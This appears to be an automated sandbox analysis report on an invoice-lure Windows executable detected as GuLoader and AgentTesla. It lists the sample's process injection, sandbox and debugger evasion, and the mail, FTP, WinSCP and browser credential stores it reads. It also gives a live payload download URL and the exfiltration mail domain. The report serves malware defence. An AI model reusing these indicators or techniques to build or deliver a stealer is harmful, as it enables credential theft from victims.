            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: 184285013-044310-Factura pendiente (2).exe, 00000002.00000002.152011911029.0000000003950000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
            Source: 184285013-044310-Factura pendiente (2).exe, 00000002.00000002.152011911029.0000000003950000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156734981903.0000000000CD0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: CasPol.exe, 00000005.00000002.156734981903.0000000000CD0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1WMG82HGVQKZVGNQ4QIGMYB0D7ZLHFGB8
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5956Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9954Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeSystem information queried: ModuleInformationJump to behavior
            Source: 184285013-044310-Factura pendiente (2).exe, 00000002.00000002.152011970701.0000000003A19000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156738160980.0000000002999000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: 184285013-044310-Factura pendiente (2).exe, 00000002.00000002.152011970701.0000000003A19000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156738160980.0000000002999000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000005.00000002.156738160980.0000000002999000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: 184285013-044310-Factura pendiente (2).exe, 00000002.00000002.152011970701.0000000003A19000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156738160980.0000000002999000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: 184285013-044310-Factura pendiente (2).exe, 00000002.00000002.152011911029.0000000003950000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
            Source: 184285013-044310-Factura pendiente (2).exe, 00000002.00000002.152011970701.0000000003A19000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156738160980.0000000002999000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: 184285013-044310-Factura pendiente (2).exe, 00000002.00000002.152011970701.0000000003A19000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156738160980.0000000002999000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000005.00000002.156738160980.0000000002999000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000005.00000002.156736867807.0000000001027000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.153195967743.0000000001027000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156736207666.0000000000FBB000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000003.152273164107.0000000001027000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: 184285013-044310-Factura pendiente (2).exe, 00000002.00000002.152011911029.0000000003950000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156734981903.0000000000CD0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: CasPol.exe, 00000005.00000002.156734981903.0000000000CD0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1wmG82hGvqKzvgNq4QIGmYB0d7zlHfgB8
            Source: 184285013-044310-Factura pendiente (2).exe, 00000002.00000002.152011970701.0000000003A19000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156738160980.0000000002999000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: 184285013-044310-Factura pendiente (2).exe, 00000002.00000002.152011970701.0000000003A19000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156738160980.0000000002999000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: 184285013-044310-Factura pendiente (2).exe, 00000002.00000002.152011970701.0000000003A19000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156738160980.0000000002999000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000005.00000002.156736867807.0000000001027000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.153195967743.0000000001027000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.152273164107.0000000001027000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW!
            Source: CasPol.exe, 00000005.00000002.156738160980.0000000002999000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00A46950 LdrInitializeThunk,5_2_00A46950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B00000Jump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe" Jump to behavior
            Source: CasPol.exe, 00000005.00000002.156737766821.0000000001540000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: CasPol.exe, 00000005.00000002.156737766821.0000000001540000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CasPol.exe, 00000005.00000002.156737766821.0000000001540000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: CasPol.exe, 00000005.00000002.156737766821.0000000001540000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4576, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4576, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4576, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol123Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            184285013-044310-Factura pendiente (2).exe55%VirustotalBrowse
            184285013-044310-Factura pendiente (2).exe64%ReversingLabsWin32.Trojan.GuLoader

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            malkaratso.org.tr0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://fi8FzJdqylCZNRsVheXc.netD/0%Avira URL Cloudsafe
            https://sectigo.com/CPS00%Avira URL Cloudsafe
            http://mail.malkaratso.org.tr0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            https://fi8FzJdqylCZNRsVheXc.nett-0%Avira URL Cloudsafe
            http://UEjXzO.com0%Avira URL Cloudsafe
            https://fi8FzJdqylCZNRsVheXc.net0%Avira URL Cloudsafe
            http://malkaratso.org.tr0%Avira URL Cloudsafe
            https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            malkaratso.org.tr
            		212.83.130.20
            		truetrueunknown
            drive.google.com
            		142.250.181.238
            		truefalse
              		high
              googlehosted.l.googleusercontent.com
              		216.58.212.129
              		truefalse
                		high
                mail.malkaratso.org.tr
                		unknown
                		unknowntrue
                  		unknown
                  doc-04-7o-docs.googleusercontent.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://doc-04-7o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/lglu03i2is66lao2nkn5tgms2vaqhaoo/1638516225000/01591657853412424088/*/1wmG82hGvqKzvgNq4QIGmYB0d7zlHfgB8?e=downloadfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1CasPol.exe, 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://DynDns.comDynDNSCasPol.exe, 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fi8FzJdqylCZNRsVheXc.netD/CasPol.exe, 00000005.00000002.156747802058.000000001DD98000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://sectigo.com/CPS0CasPol.exe, 00000005.00000002.156745452230.000000001DA3F000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156755780879.0000000020C60000.00000004.00000010.sdmp, CasPol.exe, 00000005.00000002.156748159231.000000001DDCF000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156745620906.000000001DA6E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mail.malkaratso.org.trCasPol.exe, 00000005.00000002.156748159231.000000001DDCF000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://drive.google.com/CasPol.exe, 00000005.00000002.156736207666.0000000000FBB000.00000004.00000020.sdmpfalse
                        		high
                        https://fi8FzJdqylCZNRsVheXc.nett-CasPol.exe, 00000005.00000002.156747802058.000000001DD98000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://doc-04-7o-docs.googleusercontent.com/&GNJCasPol.exe, 00000005.00000003.151987339139.0000000001035000.00000004.00000001.sdmpfalse
                          		high
                          https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 00000005.00000002.156747439081.000000001DD52000.00000004.00000001.sdmpfalse
                            		high
                            https://doc-04-7o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/lglu03i2CasPol.exe, 00000005.00000003.152273164107.0000000001027000.00000004.00000001.sdmpfalse
                              		high
                              http://UEjXzO.comCasPol.exe, 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://doc-04-7o-docs.googleusercontent.com/CasPol.exe, 00000005.00000003.152273932813.0000000000FFC000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156736526427.0000000000FF4000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000003.151982167835.000000000103C000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.151987339139.0000000001035000.00000004.00000001.sdmpfalse
                                		high
                                https://fi8FzJdqylCZNRsVheXc.netCasPol.exe, 00000005.00000002.156747802058.000000001DD98000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://malkaratso.org.trCasPol.exe, 00000005.00000002.156748159231.000000001DDCF000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://csp.withgoogle.com/csp/report-to/gse_l9ocaqCasPol.exe, 00000005.00000003.151982167835.000000000103C000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
